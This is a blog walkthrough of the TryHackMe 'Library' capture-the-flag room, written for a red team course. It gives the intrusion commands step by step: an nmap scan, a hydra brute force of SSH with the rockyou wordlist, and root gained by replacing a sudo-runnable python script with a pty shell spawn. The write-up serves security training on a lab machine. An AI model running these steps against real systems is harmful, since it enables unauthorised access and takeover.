TryHackMe: Library room walkthrough

3 min readJun 4, 2021


This is a write up covering steps taken to solve a beginner level security challenge, find user.txt and root.txt flags for Library room in TryHackMe platform.

This blog is written as part of task of Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine.

  1. Download OpenVPN configuration setting from TryHackMe platform
  2. Connect to TryHackMe by running the command in kali terminal:

sudo openvpn /pathtoOVPNfile.ovpn

3. Start machine in ‘library’ room — target ip address will be displayed in a minute.

Step 2 : Information gathering using Nmap

  1. Start nmap scan of the target ip:

nmap -A -O <target ip>

nmap output

Step 3: Detailed Findings

Open ports:

22 : SSH

80 : http Apache httpd 2.4.18

  1. Navigating to robots.txt got hint as “rockyou”

2. Accessing open ports

port 80 : Username is displayed as author

Port 80

3. Since port 22 is open, try to brute force and find user credentials with above found username and clue from robots.txt

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh

Credentials found

4. Login with above found credentials through SSH, login is successful

ssh meliodas@<targetip>

5. Found user.txt

6. checking for privileges

sudo -l

Found privileges for /home/meliodas/

7. As has permission to run with sudo NOPASSWD , so remove and create a new file.


echo ‘import pty;pty.spawn(“/bin/sh”)’ > /home/meliodas/

8. Run file with sudo permission >user got root access

sudo python /home/meliodas/

9. Navigate to root folder > found root.txt file

With these steps, I was able to answer questions posted in Library room on TryHackMe.

Thank you for reading this blog..